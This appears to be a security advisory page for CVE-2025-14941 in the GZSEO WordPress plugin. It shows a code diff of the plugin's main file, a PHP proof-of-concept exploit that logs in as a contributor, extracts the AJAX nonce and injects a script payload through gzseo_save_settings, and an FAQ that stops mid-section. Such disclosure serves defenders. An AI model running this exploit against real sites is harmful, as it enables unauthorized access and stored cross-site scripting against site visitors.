-            foreach ($item['selected_terms'] as $term_id) {
-                $term = get_term($term_id);
-                if ($term && !is_wp_error($term)) {
-                    if (!isset($terms_by_tax[$term->taxonomy])) {
-                        $terms_by_tax[$term->taxonomy] = array();
-                    }
-                    $terms_by_tax[$term->taxonomy][] = $term_id;
-                }
-            }
-
-            foreach ($terms_by_tax as $taxonomy => $term_ids) {
-                $tax_query[] = array(
-                    'taxonomy' => $taxonomy,
-                    'field' => 'term_id',
-                    'terms' => $term_ids,
-                    'operator' => 'IN'
-                );
-            }
-
-            if (!empty($tax_query)) {
-                $tax_query['relation'] = 'OR';
-                $args['tax_query'] = $tax_query;
-            }
-        }
-
-        $query = new WP_Query($args);
-        $posts = array();
-
-        if ($query->have_posts()) {
-            while ($query->have_posts()) {
-                $query->the_post();
-                $posts[] = array(
-                    'id' => get_the_ID(),
-                    'title' => get_the_title()
-                );
-            }
-            wp_reset_postdata();
-        }
-
-        wp_send_json_success(array('posts' => $posts));
-    }
-
-    public function bulk_execute()
-    {
-        if (!isset($_POST['nonce']) || !wp_verify_nonce($_POST['nonce'], 'gzseo_ajax_nonce')) {
-            wp_send_json_error(array('message' => __('خطای امنیتی', 'gzseo')));
-            return;
-        }
-
-        // لود کردن کلاس اجرای آپدیت دسته جمعی
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-bulk-execute.php';
-
-        $index = intval($_POST['index']);
-        $offset = intval($_POST['offset']);
-        $count = intval($_POST['count']);
-
-        $saved_items = get_option('gzseo_bulk_update_items', array());
-
-        if (!isset($saved_items[$index])) {
-            wp_send_json_error(array('message' => __('آیتم یافت نشد', 'gzseo')));
-            return;
-        }
-
-        $item = $saved_items[$index];
-
-        // Query arguments
-        $args = array(
-            'post_type' => $item['post_type'],
-            'posts_per_page' => $count,
-            'post_status' => 'publish', // فقط پست‌های منتشر شده
-            'offset' => $offset,
-            'orderby' => 'modified',
-            'order' => 'ASC',
-            'date_query' => array(
-                array(
-                    'column' => 'post_modified',
-                    'before' => $item['last_update'] . ' days ago'
-                )
-            )
-        );
-
-        // Add taxonomy query if terms selected
-        if (!empty($item['selected_terms'])) {
-            $tax_query = array();
-            $terms_by_tax = array();
-
-            foreach ($item['selected_terms'] as $term_id) {
-                $term = get_term($term_id);
-                if ($term && !is_wp_error($term)) {
-                    if (!isset($terms_by_tax[$term->taxonomy])) {
-                        $terms_by_tax[$term->taxonomy] = array();
-                    }
-                    $terms_by_tax[$term->taxonomy][] = $term_id;
-                }
-            }
-
-            foreach ($terms_by_tax as $taxonomy => $term_ids) {
-                $tax_query[] = array(
-                    'taxonomy' => $taxonomy,
-                    'field' => 'term_id',
-                    'terms' => $term_ids,
-                    'operator' => 'IN'
-                );
-            }
-
-            if (!empty($tax_query)) {
-                $tax_query['relation'] = 'OR';
-                $args['tax_query'] = $tax_query;
-            }
-        }
-
-        $query = new WP_Query($args);
-        $processed = 0;
-        $logs = array();
-
-        if ($query->have_posts()) {
-            while ($query->have_posts()) {
-                $query->the_post();
-                $post_id = get_the_ID();
-                $post_title = get_the_title();
-
-                // Execute update based on type
-                $result = array();
-
-                switch ($item['update_type']) {
-                    case 'table':
-                        $result = GZSEO_Bulk_Execute::execute_table_update($post_id, true);
-                        break;
-
-                    case 'comment':
-                        $result = GZSEO_Bulk_Execute::execute_comment_update($post_id, true);
-                        break;
-
-                    case 'content_update':
-                        $result = GZSEO_Bulk_Execute::execute_content_update($post_id, true);
-                        break;
-
-                    case 'video_update':
-                        $result = GZSEO_Bulk_Execute::execute_video_update($post_id, true);
-                        break;
-
-                    case 'feature_img':
-                        $result = GZSEO_Bulk_Execute::execute_featured_image_update($post_id, true);
-                        break;
-
-                    default:
-                        $result = array(
-                            'success' => false,
-                            'message' => __('نوع آپدیت نامعتبر است', 'gzseo')
-                        );
-                }
-
-                // Add to logs
-                $logs[] = array(
-                    'status' => $result['success'] ? 'success' : 'error',
-                    'message' => sprintf(
-                        '%s: %s - %s',
-                        $result['success'] ? '✓' : '✗',
-                        $post_title,
-                        $result['message']
-                    )
-                );
-
-                if ($result['success']) {
-                    $processed++;
-                }
-            }
-            wp_reset_postdata();
-        }
-
-        $main_instance = GZSeo::get_instance();
-        if (method_exists($main_instance, 'update_ai_credits')) {
-            $main_instance->update_ai_credits(true);
-        }
-
-        wp_send_json_success(array(
-            'processed' => $processed,
-            'message' => sprintf(__('%d مورد با موفقیت آپدیت شد', 'gzseo'), $processed),
-            'logs' => $logs
-        ));
-    }
-
-    public function save_config() {
-        // بررسی nonce
-        if (!isset($_POST['nonce']) || !wp_verify_nonce($_POST['nonce'], 'gzseo_ajax_nonce')) {
-            wp_send_json_error(array('message' => __('خطای امنیتی', 'gzseo')));
-            return;
-        }
-
-        // بررسی دسترسی کاربر
-        if (!current_user_can('manage_options')) {
-            wp_send_json_error(array('message' => __('شما دسترسی لازم را ندارید', 'gzseo')));
-            return;
-        }
-
-        $config_type = sanitize_text_field($_POST['config_type']);
-        $config = $_POST['config'];
-
-        switch($config_type) {
-            case 'content-update':
-                // ذخیره تنظیمات آپدیت محتوا
-                update_option('gzseo_accordion_display', $config['accordion_display'] === 'true' ? 1 : 0);
-                update_option('gzseo_accordion_title', sanitize_text_field($config['accordion_title']));
-                update_option('gzseo_text_position', sanitize_text_field($config['text_position']));
-                update_option('gzseo_video_position', sanitize_text_field($config['video_position']));
-
-                wp_send_json_success(array('message' => __('تنظیمات آپدیت محتوا با موفقیت ذخیره شد', 'gzseo')));
-                break;
-
-            case 'comment-management':
-                // ذخیره تنظیمات مدیریت کامنت
-                update_option('gzseo_comment_tone', sanitize_text_field($config['tone']));
-                update_option('gzseo_comment_word_count', intval($config['word_count']));
-
-                wp_send_json_success(array('message' => __('تنظیمات مدیریت کامنت با موفقیت ذخیره شد', 'gzseo')));
-                break;
-
-            case 'table-style':
-                // این بخش قبلا در کلاس GZSEO_Table_Styles مدیریت می‌شود
-                wp_send_json_error(array('message' => __('از اکشن مخصوص table styles استفاده کنید', 'gzseo')));
-                break;
-
-            case 'schema':
-                // ذخیره تنظیمات اسکیما (برای استفاده‌های آینده)
-                update_option('gzseo_schema_settings', $config);
-
-                wp_send_json_success(array('message' => __('تنظیمات اسکیما با موفقیت ذخیره شد', 'gzseo')));
-                break;
-
-            default:
-                wp_send_json_error(array('message' => __('نوع پیکربندی نامعتبر است', 'gzseo')));
-                break;
-        }
-    }
-
-    /**
-    * به‌روزرسانی موجودی حساب کاربری
-    */
-    public function update_ai_credits($force_update = false) {
-        // بررسی وضعیت لاگین
-        if (!$this->is_ai_connected()) {
-            return false;
-        }
-
-        // بررسی کش و جلوگیری از درخواست‌های مکرر
-        $cache_key = 'gzseo_ai_credits_last_check';
-        $last_check = get_transient($cache_key);
-        $current_time = time();
-
-        // اگر force_update نباشد و کمتر از 5 دقیقه از آخرین بررسی گذشته باشد
-        if (!$force_update && $last_check && ($current_time - $last_check) < 300) {
-            return get_option('gzseo_ai_credits', 0);
-        }
-
-        // دریافت اطلاعات کاربری
-        $email = get_option('gzseo_ai_email', '');
-        $password = base64_decode(get_option('gzseo_ai_password', ''));
-
-        if (empty($email) || empty($password)) {
-            return false;
-        }
-
-        // ارسال درخواست به API
-        $response = wp_remote_post('https://api.gzseo.in/login', array(
-            'method' => 'POST',
-            'timeout' => 30,
-            'headers' => array(
-                'Content-Type' => 'application/json',
-            ),
-            'body' => json_encode(array(
-                'email' => $email,
-                'password' => $password
-            ))
-        ));
-
-        // بررسی خطا
-        if (is_wp_error($response)) {
-            // ذخیره زمان خطا برای تلاش بعدی
-            set_transient('gzseo_ai_api_error', true, 300); // 5 دقیقه
-            return get_option('gzseo_ai_credits', 0);
-        }
-
-        $body = wp_remote_retrieve_body($response);
-        $data = json_decode($body, true);
-        $status_code = wp_remote_retrieve_response_code($response);
-
-        if ($status_code === 200 && isset($data['words'])) {
-            // به‌روزرسانی موجودی
-            update_option('gzseo_ai_credits', $data['words']);
-            update_option('gzseo_ai_user_data', $data);
-            update_option('gzseo_ai_last_update', current_time('mysql'));
-
-            // ذخیره زمان آخرین بررسی موفق
-            set_transient($cache_key, $current_time, 300); // 5 دقیقه
-
-            return $data['words'];
-        }
-
-        // در صورت خطا، مقدار قبلی را برگردان
-        return get_option('gzseo_ai_credits', 0);
-    }
-
-    /**
-    * ارسال درخواست API با قابلیت retry
-    */
-    private function make_api_request_with_retry($url, $data, $max_retries = 2) {
-        $attempt = 0;
-        $timeout = 5; // شروع با 5 ثانیه timeout
-
-        while ($attempt < $max_retries) {
-            $response = wp_remote_post($url, array(
-                'method' => 'POST',
-                'timeout' => $timeout,
-                'headers' => array(
-                    'Content-Type' => 'application/json',
-                ),
-                'body' => json_encode($data),
-                'sslverify' => true,
-                'data_format' => 'body'
-            ));
-
-            // بررسی خطا
-            if (!is_wp_error($response)) {
-                $status_code = wp_remote_retrieve_response_code($response);
-
-                if ($status_code === 200) {
-                    $body = wp_remote_retrieve_body($response);
-                    $result = json_decode($body, true);
-
-                    if (json_last_error() === JSON_ERROR_NONE) {
-                        return $result;
-                    }
-                }
-
-                // اگر سرور جواب داد ولی خطا بود (مثلا 401)
-                if ($status_code >= 400 && $status_code < 500) {
-                    // خطای client-side، retry نکن
-                    $this->log_api_error(__('Client error', 'gzseo'), $status_code);
-                    return false;
-                }
-            } else {
-                // log error for debugging
-                $this->log_api_error($response->get_error_message(), $attempt + 1);
-            }
-
-            $attempt++;
-
-            // افزایش timeout برای تلاش بعدی
-            $timeout = min($timeout * 1.5, 15); // حداکثر 15 ثانیه
-
-            // صبر قبل از تلاش مجدد (exponential backoff)
-            if ($attempt < $max_retries) {
-                sleep(pow(2, $attempt - 1)); // 1, 2, 4 ثانیه
-            }
-        }
-
-        // در صورت شکست همه تلاش‌ها
-        set_transient('gzseo_ai_api_error', true, 300); // 5 دقیقه نشانه خطا
-        return false;
-    }
-
-    /**
-    * لاگ خطاهای API (اختیاری)
-    */
-    private function log_api_error($message, $context = '') {
-        if (defined('WP_DEBUG') && WP_DEBUG === true) {
-            error_log(sprintf(
-                '[GZSEO AI] ' . __('API Error:', 'gzseo') . ' %s | ' . __('Context:', 'gzseo') . ' %s | ' . __('Time:', 'gzseo') . ' %s',
-                $message,
-                $context,
-                current_time('mysql')
-            ));
-        }
-    }
-
-    /**
-    * تابع کمکی برای دریافت موجودی با کش
-    */
-    public function get_cached_ai_credits() {
-        // اگر API دچار خطا شده، از کش استفاده کن
-        if (get_transient('gzseo_ai_api_error')) {
-            return get_option('gzseo_ai_credits', 0);
-        }
-
-        // در غیر این صورت سعی کن به‌روزرسانی کن
-        return $this->update_ai_credits();
-    }
-
-    /**
-    * AJAX handler برای به‌روزرسانی موجودی
-    */
-    public function ajax_update_ai_credits() {
-        // بررسی nonce
-        if (!isset($_POST['nonce']) || !wp_verify_nonce($_POST['nonce'], 'gzseo_ajax_nonce')) {
-            wp_send_json_error(array('message' => __('خطای امنیتی', 'gzseo')));
-            return;
-        }
-
-        $credits = $this->update_ai_credits(true); // force update
-
-        if ($credits !== false) {
-            wp_send_json_success(array(
-                'credits' => number_format($credits),
-                'raw_credits' => $credits
-            ));
-        } else {
-            // حتی در صورت خطا، مقدار کش شده را برگردان
-            $cached_credits = get_option('gzseo_ai_credits', 0);
-            wp_send_json_success(array(
-                'credits' => number_format($cached_credits),
-                'raw_credits' => $cached_credits,
-                'cached' => true
-            ));
-        }
-    }
-
-    /**
-    * تابع استاتیک برای دسترسی آسان
-    */
-    public static function get_updated_credits($force = false) {
-        $instance = self::get_instance();
-        return $instance->update_ai_credits($force);
-    }
-
-    public function check_and_run_migration() {
-        // اجرا فقط در پنل ادمین
-        if (!is_admin()) {
-            return;
-        }
-
-        // بررسی و اجرای migration برای AI
-        if (GZSEO_AI_Migration::check_migration_needed()) {
-            GZSEO_AI_Migration::migrate();
-        }
-
-        // بررسی و اجرای migration برای Search Console
-        if (GZSEO_Search_Console_Migration::check_migration_needed()) {
-            GZSEO_Search_Console_Migration::migrate();
-        }
-
-        // لود کردن Migration Manager برای بقیه migrations
-        require_once GZSEO_PLUGIN_PATH . 'includes/migrations/class-gzseo-migration-manager.php';
-
-        // اجرای migrations اتوماتیک
-        GZSEO_Migration_Manager::run_auto_migrations();
-    }
-}
-
-// Initialize plugin
-add_action('plugins_loaded', function () {
-    GZSeo::get_instance();
-});
-
-// Activation hook
-register_activation_hook(__FILE__, function () {
-    // Create necessary database tables or options
-    add_option('gzseo_version', GZSEO_VERSION);
-
-    require_once GZSEO_PLUGIN_PATH . 'includes/migrations/class-gzseo-ai-migration.php';
-    GZSEO_AI_Migration::migrate();
-
-    // Migration برای Search Console
-    require_once GZSEO_PLUGIN_PATH . 'includes/migrations/class-gzseo-search-console-migration.php';
-    GZSEO_Search_Console_Migration::migrate();
-});
-
-// Deactivation hook
-register_deactivation_hook(__FILE__, function () {
-    // Cleanup if necessary
-
-    // Clear transient on deactivation
-    delete_transient('gzseo_last_scheduled_check');
+<?php
+/**
+ * Plugin Name: GZSEO
+ * Description: Generation Z SEO Plugin | Website SEO Powered by Artificial Intelligence
+ * Author: Amin Hashemi
+ * Version: 2.0.12
+ * Author URI: https://aminhashemy.org/
+ * License: GPLv2
+ * License URI: https://www.gnu.org/licenses/gpl-2.0.html
+ */
+
+// جلوگیری از دسترسی مستقیم
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
+// تعریف ثابت‌ها
+define( 'GZSEO_VERSION', '2.0.12' );
+define( 'GZSEO_PLUGIN_URL', plugin_dir_url( __FILE__ ) );
+define( 'GZSEO_PLUGIN_PATH', plugin_dir_path( __FILE__ ) );
+
+// کلاس اصلی افزونه
+class GZSeo
+{
+
+    private static $instance = null;
+
+    public static function get_instance()
+    {
+        if (null === self::$instance) {
+            self::$instance = new self();
+        }
+        return self::$instance;
+    }
+
+    private function __construct()
+    {
+        add_action('init', array($this, 'load_textdomain'));
+
+        // Load security helpers first
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-security-helpers.php';
+
+        $this->init_hooks();
+
+        require_once GZSEO_PLUGIN_PATH . 'includes/ajax-handlers.php';
+
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-featured-image-ai.php';
+
+        // Load Comment Generator AI module
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-comment-generator-ai.php';
+
+        // Load Search Console module
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-search-console.php';
+        new GZSEO_Search_Console();
+
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-ai-api.php';
+
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-search-keywords.php';
+
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-table-generator.php';
+        //$this->table_generator = new GZSEO_Table_Generator();
+
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-title-description-generator.php';
+
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-video-update.php';
+
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-content-update.php';
+
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-table-styles.php';
+
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-person-schema.php';
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-product-list-schema.php';
+
+        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-featured-image-settings.php';
+
+        require_once GZSEO_PLUGIN_PATH . 'includes/migrations/class-gzseo-migration-manager.php';
+
+        require_once GZSEO_PLUGIN_PATH . 'includes/migrations/class-gzseo-ai-migration.php';
+        require_once GZSEO_PLUGIN_PATH . 'includes/migrations/class-gzseo-search-console-migration.php';
+    }
+
+    private function init_hooks()
+    {
+        add_action('admin_menu', array($this, 'add_admin_menu'));
+        add_action('admin_enqueue_scripts', array($this, 'enqueue_admin_assets'));
+        add_action('wp_ajax_gzseo_save_settings', array($this, 'save_settings'));
+        add_action('wp_ajax_gzseo_refresh_dashboard', array($this, 'refresh_dashboard'));
+        add_action('wp_ajax_gzseo_auth_google', array($this, 'auth_google'));
+        add_action('wp_ajax_gzseo_disconnect_google', array($this, 'disconnect_google'));
+        add_action('wp_ajax_gzseo_save_bulk_update', array($this, 'save_bulk_update'));
+        add_action('wp_ajax_gzseo_save_config', array($this, 'save_config'));
+        // اضافه کردن متاباکس به صفحات ادمین
+        add_action('add_meta_boxes', array($this, 'add_gzseo_metabox'));
+
+        // اضافه کردن متاباکس به دسته‌بندی‌ها
+        add_action('category_edit_form_fields', array($this, 'render_taxonomy_fields_limited'), 10, 2);
+        add_action('post_tag_edit_form_fields', array($this, 'render_taxonomy_fields_limited'), 10, 2);
+        add_action('product_cat_edit_form_fields', array($this, 'render_taxonomy_fields_limited'), 10, 2);
+        add_action('product_tag_edit_form_fields', array($this, 'render_taxonomy_fields_limited'), 10, 2);
+
+        add_action('save_post', array($this, 'save_gzseo_metabox'));
+
+        add_action('wp_ajax_gzseo_get_taxonomy_terms', array($this, 'get_taxonomy_terms'));
+
+        add_action('wp_ajax_gzseo_bulk_preview', array($this, 'bulk_preview'));
+        add_action('wp_ajax_gzseo_bulk_execute', array($this, 'bulk_execute'));
+
+        add_action('wp_ajax_gzseo_update_ai_credits', array($this, 'ajax_update_ai_credits'));
+
+        add_action('init', array($this, 'check_and_run_migration'), 5);
+
+        add_filter('http_request_timeout', function ($timeout) {
+            return 300;
+        });
+
+        add_filter('http_request_args', function ($args) {
+            $args['timeout']         = 300;
+            $args['connect_timeout'] = 10;
+            return $args;
+        });
+    }
+
+    public function save_gzseo_metabox()
+    {
+
+    }
+
+    // متد بررسی اتصال
+    public function is_ai_connected()
+    {
+        return get_option('gzseo_ai_logged_in', false);
+    }
+
+    // متد دریافت ایمیل
+    public function get_ai_email()
+    {
+        return get_option('gzseo_ai_email', '');
+    }
+
+    // متد دریافت اعتبار
+    public function get_ai_credits()
+    {
+        $credits = get_option('gzseo_ai_credits', 0);
+        return absint( $credits );
+    }
+
+    /*public function load_textdomain()
+    {
+        load_plugin_textdomain('gzseo', false, dirname(plugin_basename(__FILE__)) . '/languages');
+    }*/
+    public function load_textdomain()
+    {
+        $domain = 'gzseo';
+        $locale = get_locale(); // همیشه en_US خواهد بود
+
+        // ساخت مسیر کامل و دقیق فایل .mo
+        $mofile = plugin_dir_path(__FILE__) . 'languages/' . $domain . '-' . $locale . '.mo';
+
+        // دیباگ: نمایش اطلاعات
+        if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+            // Debug logging disabled for WordPress.org compliance.
+        }
+
+        // بارگذاری مستقیم فایل .mo
+        load_textdomain($domain, $mofile);
+
+        // دیباگ: بررسی نهایی
+        if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+            // Debug logging disabled for WordPress.org compliance.
+        }
+    }
+
+    public function add_admin_menu()
+    {
+        // منوی اصلی
+        add_menu_page(
+            __('جی زد سئو', 'gzseo'),
+            __('جی زد سئو', 'gzseo'),
+            'manage_options',
+            'gzseo-dashboard',
+            array($this, 'render_dashboard'),
+            'dashicons-chart-line',
+            30
+        );
+
+        // زیرمنوی داشبورد
+        add_submenu_page(
+            'gzseo-dashboard',
+            __('داشبورد', 'gzseo'),
+            __('داشبورد', 'gzseo'),
+            'manage_options',
+            'gzseo-dashboard',
+            array($this, 'render_dashboard')
+        );
+
+        // زیرمنوی آپدیت دسته جمعی
+        add_submenu_page(
+            'gzseo-dashboard',
+            __('آپدیت دسته جمعی', 'gzseo'),
+            __('آپدیت دسته جمعی', 'gzseo'),
+            'manage_options',
+            'gzseo-bulk-update',
+            array($this, 'render_bulk_update_page')
+        );
+
+        // زیرمنوی گزارشات
+        add_submenu_page(
+            'gzseo-dashboard',
+            __('گزارشات', 'gzseo'),
+            __('گزارشات', 'gzseo'),
+            'manage_options',
+            'gzseo-reports',
+            array($this, 'render_reports_page')
+        );
+    }
+
+    public function enqueue_admin_assets($hook)
+    {
+        // صفحات افزونه
+        $gzseo_pages = array(
+            'toplevel_page_gzseo-dashboard',
+            'جی-زد-سئو_page_gzseo-reports',
+            'جی-زد-سئو_page_gzseo-bulk-update'
+        );
+
+        // صفحات ویرایش پست‌ها
+        $edit_pages = array(
+            'post.php',
+            'post-new.php',
+            'term.php',
+            'edit-tags.php'
+        );
+        //echo $hook;die();
+
+        // بررسی صفحات افزونه یا صفحات ویرایش
+        if ( ! in_array( urldecode( $hook ), $gzseo_pages, true ) && ! in_array( $hook, $edit_pages, true ) ) {
+            return;
+        }
+
+        // فقط برای صفحات ویرایش، بررسی نوع پست
+        if ( in_array( $hook, $edit_pages, true ) ) {
+            global $post_type, $taxnow;
+
+            // نوع‌های پست مجاز
+            $allowed_post_types = array('post', 'page', 'product');
+
+            // تکسونومی‌های مجاز
+            $allowed_taxonomies = array('category', 'post_tag', 'product_cat', 'product_tag');
+
+            // بررسی نوع پست
+            if ( isset( $post_type ) && ! in_array( $post_type, $allowed_post_types, true ) ) {
+                return;
+            }
+
+            // بررسی تکسونومی برای صفحات ترم
+            if ( ( 'term.php' === $hook || 'edit-tags.php' === $hook ) && isset( $taxnow ) && ! in_array( $taxnow, $allowed_taxonomies, true ) ) {
+                return;
+            }
+        }
+
+        // Select2 CSS
+        wp_enqueue_style(
+            'select2',
+            GZSEO_PLUGIN_URL . 'assets/css/select2.min.css',
+            array(),
+            GZSEO_VERSION
+        );
+
+        // Select2 JS
+        wp_enqueue_script(
+            'select2',
+            GZSEO_PLUGIN_URL . 'assets/js/select2.min.js',
+            array( 'jquery' ),
+            GZSEO_VERSION,
+            true
+        );
+
+        // Enqueue styles
+        wp_enqueue_style(
+            'gzseo-admin',
+            GZSEO_PLUGIN_URL . 'assets/admin.css',
+            array(),
+            GZSEO_VERSION
+        );
+
+        // Enqueue Font Awesome
+        wp_enqueue_style(
+            'gzseo-fontawesome',
+            GZSEO_PLUGIN_URL . 'assets/css/all.min.css',
+            array(),
+            GZSEO_VERSION
+        );
+
+        wp_enqueue_script(
+            'gzseo-admin',
+            GZSEO_PLUGIN_URL . 'assets/admin.js',
+            array( 'jquery', 'select2' ),
+            GZSEO_VERSION,
+            true
+        );
+
+        // Localize script
+        wp_localize_script(
+            'gzseo-admin',
+            'gzseo_ajax',
+            array(
+                'ajax_url'     => admin_url( 'admin-ajax.php' ),
+                'nonce'        => wp_create_nonce( 'gzseo_ajax_nonce' ),
+                'current_page' => $hook,
+                'post_type'    => isset( $post_type ) ? $post_type : '',
+                'post_id'      => get_the_ID(),
+                'messages'     => array(
+                    'confirm_delete' => __( 'آیا مطمئن هستید؟', 'gzseo' ),
+                    'loading'        => __( 'در حال بارگذاری...', 'gzseo' ),
+                    'error'          => __( 'خطایی رخ داده است', 'gzseo' ),
+                    'success'        => __( 'عملیات با موفقیت انجام شد', 'gzseo' ),
+                ),
+            )
+        );
+
+        // Enqueue specific script for bulk update page
+        wp_enqueue_script(
+            'gzseo-bulk-update-page',
+            GZSEO_PLUGIN_URL . 'assets/js/bulk-update-page.js',
+            array( 'jquery' ),
+            GZSEO_VERSION,
+            true
+        );
+
+        // Enqueue featured image settings script
+        wp_enqueue_script(
+            'gzseo-featured-image-settings',
+            GZSEO_PLUGIN_URL . 'assets/js/featured-image-settings.js',
+            array( 'jquery' ),
+            GZSEO_VERSION,
+            true
+        );
+
+    }
+
+    public function render_dashboard()
+    {
+        require_once GZSEO_PLUGIN_PATH . 'includes/admin-dashboard.php';
+    }
+
+    public function render_bulk_update_page()
+    {
+        require_once GZSEO_PLUGIN_PATH . 'includes/admin-bulk-update.php';
+    }
+
+    public function render_reports_page()
+    {
+        require_once GZSEO_PLUGIN_PATH . 'includes/admin-reports.php';
+    }
+
+    public function add_gzseo_metabox()
+    {
+        $post_types = array('post', 'page', 'product');
+
+        foreach ($post_types as $post_type) {
+            add_meta_box(
+                'gzseo_metabox',
+                __( 'امکانات افزونه جی زد سئو', 'gzseo' ),
+                array($this, 'render_gzseo_metabox'),
+                $post_type,
+                'normal',
+                'high'
+            );
+        }
+
+
+    }
+
+    public function render_gzseo_metabox($post)
+    {
+        wp_nonce_field('gzseo_metabox_nonce', 'gzseo_metabox_nonce');
+        $this->render_gzseo_fields();
+    }
+
+    public function render_taxonomy_fields($term)
+    {
+        ?>
+        <tr class="form-field">
+            <td colspan="2">
+                <?php $this->render_gzseo_fields(); ?>
+            </td>
+        </tr>
+        <?php
+    }
+
+    public function render_taxonomy_fields_limited($term)
+    {
+        ?>
+        <tr class="form-field">
+            <td colspan="2">
+                <?php $this->render_gzseo_fields_limited(); ?>
+            </td>
+        </tr>
+        <?php
+    }
+
+    private function render_gzseo_fields()
+    {
+        $ai_credits = get_option('gzseo_ai_credits', 0);
+        global $post;
+        ?>
+        <div class="gzseo-metabox-wrapper">
+            <div class="gzseo-metabox-header">
+                <div class="gzseo-metabox-title"><?php esc_html_e('امکانات افزونه جی زد سئو', 'gzseo'); ?></div>
+                <div class="gzseo-metabox-credits">
+                    <i class="fas fa-coins"></i>
+                    <?php esc_html_e('اعتبار شما:', 'gzseo'); ?> <span class="gzseo-credits-amount"><?php echo esc_html( number_format_i18n( $ai_credits ) ); ?></span> <?php esc_html_e('توکن', 'gzseo');

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14941 - GZSEO <= 2.0.11 - Authenticated (Contributor+) Authorization Bypass to Stored Cross-Site Scripting
<?php

$target_url = 'http://vulnerable-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// Step 1: Authenticate and obtain cookies and nonce
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
)));
$response = curl_exec($ch);

// Step 2: Visit a GZSEO admin page to harvest a valid nonce
// The nonce is typically embedded in page scripts as 'gzseo_ajax_nonce'
$gzseo_page = $target_url . '/wp-admin/admin.php?page=gzseo-dashboard';
curl_setopt($ch, CURLOPT_URL, $gzseo_page);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce from the page (simplified regex - in practice, parse the HTML/script)
// The nonce is localized in a script variable: gzseo_ajax.nonce
preg_match('/gzseo_ajax.*?nonce.*?["']([a-f0-9]+)["']/', $response, $matches);
$nonce = $matches[1] ?? '';

if (empty($nonce)) {
    die('Failed to extract nonce. The user may not have access to GZSEO pages.');
}

// Step 3: Exploit the missing capability check by calling a privileged AJAX handler
// We target gzseo_save_settings as an example. The payload is injected via a parameter like embed_code.
$payload = '<script>alert("Atomic Edge XSS");</script>';

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => 'gzseo_save_settings',
    'nonce' => $nonce,
    'embed_code' => $payload, // This parameter is insufficiently sanitized
    'other_setting' => 'value' // Other required parameters
)));

$response = curl_exec($ch);
curl_close($ch);

// Check response
if (strpos($response, 'success') !== false) {
    echo "Exploit likely succeeded. Payload injected.n";
    echo "Response: $responsen";
} else {
    echo "Exploit may have failed.n";
    echo "Response: $responsen";
}

// Note: To achieve stored XSS, the injected embed_code must be saved to a post and then rendered.
// This PoC demonstrates the authorization bypass to call the handler. A full chain would require
// interacting with other plugin functions to associate the payload with a specific post.
?>

Frequently Asked Questions

What is CVE-2025-14941?
Overview of the vulnerability
CVE-2025-14941 is a medium-severity vulnerability in the GZSEO plugin for WordPress, allowing authenticated users with Contributor-level access or higher to bypass authorization checks and perform stored cross-site scripting (XSS) attacks.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing capability checks on AJAX handlers combined with insufficient input sanitization on the embed_code parameter. This allows attackers to inject malicious scripts into posts, which execute when other users view the affected pages.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using GZSEO version 2.0.11 or earlier is affected. Specifically, authenticated users with Contributor-level permissions or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps for verification
Check the version of the GZSEO plugin installed on your WordPress site. If it is version 2.0.11 or earlier, your site is vulnerable to CVE-2025-14941.
How can I fix this vulnerability?
Mitigation steps
